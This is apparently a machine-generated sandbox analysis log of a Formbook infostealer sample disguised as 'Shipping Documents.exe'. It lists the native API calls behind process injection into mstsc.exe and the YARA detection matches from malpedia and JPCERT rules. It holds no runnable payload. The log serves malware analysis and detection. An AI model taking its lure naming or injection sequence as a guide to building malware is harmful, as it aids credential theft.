          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00419F40 NtAllocateVirtualMemory,2_2_00419F40
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00419D5A NtCreateFile,2_2_00419D5A
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF98F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_00AF98F0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9860 NtQuerySystemInformation,LdrInitializeThunk,2_2_00AF9860
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9840 NtDelayExecution,LdrInitializeThunk,2_2_00AF9840
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF99A0 NtCreateSection,LdrInitializeThunk,2_2_00AF99A0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_00AF9910
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9A20 NtResumeThread,LdrInitializeThunk,2_2_00AF9A20
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_00AF9A00
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9A50 NtCreateFile,LdrInitializeThunk,2_2_00AF9A50
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF95D0 NtClose,LdrInitializeThunk,2_2_00AF95D0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9540 NtReadFile,LdrInitializeThunk,2_2_00AF9540
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF96E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_00AF96E0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_00AF9660
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF97A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_00AF97A0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9780 NtMapViewOfSection,LdrInitializeThunk,2_2_00AF9780
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9710 NtQueryInformationToken,LdrInitializeThunk,2_2_00AF9710
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF98A0 NtWriteVirtualMemory,2_2_00AF98A0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9820 NtEnumerateKey,2_2_00AF9820
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AFB040 NtSuspendThread,2_2_00AFB040
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF99D0 NtCreateProcessEx,2_2_00AF99D0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9950 NtQueueApcThread,2_2_00AF9950
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9A80 NtOpenDirectoryObject,2_2_00AF9A80
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9A10 NtQuerySection,2_2_00AF9A10
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AFA3B0 NtGetContextThread,2_2_00AFA3B0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9B00 NtSetValueKey,2_2_00AF9B00
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF95F0 NtQueryInformationFile,2_2_00AF95F0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9520 NtWaitForSingleObject,2_2_00AF9520
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AFAD30 NtSetContextThread,2_2_00AFAD30
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9560 NtWriteFile,2_2_00AF9560
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF96D0 NtCreateKey,2_2_00AF96D0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9610 NtEnumerateValueKey,2_2_00AF9610
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9670 NtQueryInformationProcess,2_2_00AF9670
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9650 NtQueryValueKey,2_2_00AF9650
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9FE0 NtCreateMutant,2_2_00AF9FE0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9730 NtQueryVirtualMemory,2_2_00AF9730
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AFA710 NtOpenProcessToken,2_2_00AFA710
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9760 NtOpenProcess,2_2_00AF9760
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9770 NtSetInformationFile,2_2_00AF9770
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AFA770 NtOpenThread,2_2_00AFA770
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829840 NtDelayExecution,LdrInitializeThunk,7_2_04829840
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829860 NtQuerySystemInformation,LdrInitializeThunk,7_2_04829860
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048299A0 NtCreateSection,LdrInitializeThunk,7_2_048299A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048295D0 NtClose,LdrInitializeThunk,7_2_048295D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829910 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_04829910
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829540 NtReadFile,LdrInitializeThunk,7_2_04829540
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048296D0 NtCreateKey,LdrInitializeThunk,7_2_048296D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048296E0 NtFreeVirtualMemory,LdrInitializeThunk,7_2_048296E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829650 NtQueryValueKey,LdrInitializeThunk,7_2_04829650
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829A50 NtCreateFile,LdrInitializeThunk,7_2_04829A50
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829660 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_04829660
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829780 NtMapViewOfSection,LdrInitializeThunk,7_2_04829780
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829FE0 NtCreateMutant,LdrInitializeThunk,7_2_04829FE0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829710 NtQueryInformationToken,LdrInitializeThunk,7_2_04829710
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048298A0 NtWriteVirtualMemory,7_2_048298A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048298F0 NtReadVirtualMemory,7_2_048298F0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829820 NtEnumerateKey,7_2_04829820
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0482B040 NtSuspendThread,7_2_0482B040
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048299D0 NtCreateProcessEx,7_2_048299D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048295F0 NtQueryInformationFile,7_2_048295F0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829520 NtWaitForSingleObject,7_2_04829520
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0482AD30 NtSetContextThread,7_2_0482AD30
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829950 NtQueueApcThread,7_2_04829950
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829560 NtWriteFile,7_2_04829560
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829A80 NtOpenDirectoryObject,7_2_04829A80
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829A00 NtProtectVirtualMemory,7_2_04829A00
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829610 NtEnumerateValueKey,7_2_04829610
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829A10 NtQuerySection,7_2_04829A10
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829A20 NtResumeThread,7_2_04829A20
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829670 NtQueryInformationProcess,7_2_04829670
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048297A0 NtUnmapViewOfSection,7_2_048297A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0482A3B0 NtGetContextThread,7_2_0482A3B0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829B00 NtSetValueKey,7_2_04829B00
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0482A710 NtOpenProcessToken,7_2_0482A710
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829730 NtQueryVirtualMemory,7_2_04829730
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829760 NtOpenProcess,7_2_04829760
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829770 NtSetInformationFile,7_2_04829770
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0482A770 NtOpenThread,7_2_0482A770
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_00489D60 NtCreateFile,7_2_00489D60
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_00489E10 NtReadFile,7_2_00489E10
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_00489E90 NtClose,7_2_00489E90
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_00489F40 NtAllocateVirtualMemory,7_2_00489F40
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_00489D5A NtCreateFile,7_2_00489D5A
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 1_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403461
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 1_2_004069251_2_00406925
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_0041E8532_2_0041E853
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_0041D07C2_2_0041D07C
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_0041E00E2_2_0041E00E
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_0041EA8B2_2_0041EA8B
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00402D872_2_00402D87
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00409E402_2_00409E40
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00409E3C2_2_00409E3C
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE20A02_2_00AE20A0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B820A82_2_00B820A8
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ACB0902_2_00ACB090
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B710022_2_00B71002
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AD41202_2_00AD4120
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ABF9002_2_00ABF900
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B822AE2_2_00B822AE
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AEEBB02_2_00AEEBB0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B7DBD22_2_00B7DBD2
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B82B282_2_00B82B28
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC841F2_2_00AC841F
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE25812_2_00AE2581
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ACD5E02_2_00ACD5E0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B825DD2_2_00B825DD
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB0D202_2_00AB0D20
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B82D072_2_00B82D07
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B81D552_2_00B81D55
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B82EF72_2_00B82EF7
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AD6E302_2_00AD6E30
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B81FF12_2_00B81FF1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048120A07_2_048120A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B20A87_2_048B20A8
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F841F7_2_047F841F
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A10027_2_048A1002
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047FB0907_2_047FB090
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048125817_2_04812581
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E0D207_2_047E0D20
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EF9007_2_047EF900
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B2D077_2_048B2D07
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047FD5E07_2_047FD5E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048041207_2_04804120
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B1D557_2_048B1D55
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B22AE7_2_048B22AE
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B2EF77_2_048B2EF7
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04806E307_2_04806E30
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481EBB07_2_0481EBB0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B1FF17_2_048B1FF1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B2B287_2_048B2B28
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0048D07C7_2_0048D07C
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0048E00E7_2_0048E00E
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_00472D877_2_00472D87
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_00472D907_2_00472D90
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_00479E407_2_00479E40
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_00479E3C7_2_00479E3C
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_00472FB07_2_00472FB0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 047EB150 appears 35 times
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: String function: 00ABB150 appears 35 times
          Source: 202139769574 Shipping Documents.exe, 00000001.00000003.646094416.000000000334F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 202139769574 Shipping Documents.exe
          Source: 202139769574 Shipping Documents.exe, 00000002.00000002.701116428.0000000000BAF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 202139769574 Shipping Documents.exe
          Source: 202139769574 Shipping Documents.exe, 00000002.00000002.702183379.0000000002823000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemstsc.exej% vs 202139769574 Shipping Documents.exe
          Source: 202139769574 Shipping Documents.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.657714825.0000000003070000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.657714825.0000000003070000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.700421859.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.700421859.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.907951301.0000000000C80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.907951301.0000000000C80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000001.650273193.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000001.650273193.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.907896289.0000000000A20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.907896289.0000000000A20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.202139769574 Shipping Documents.exe.3070000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.202139769574 Shipping Documents.exe.3070000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.202139769574 Shipping Documents.exe.3070000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.202139769574 Shipping Documents.exe.3070000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/4@3/2
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 1_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403461
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 1_2_0040473E GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,1_2_0040473E
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 1_2_0040216B CoCreateInstance,MultiByteToWideChar,1_2_0040216B
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3984:120:WilError_01
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeFile created: C:\Users\user\AppData\Local\Temp\nseCE56.tmpJump to behavior
          Source: 202139769574 Shipping Documents.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeFile read: C:\Users\desktop.iniJump to behavior
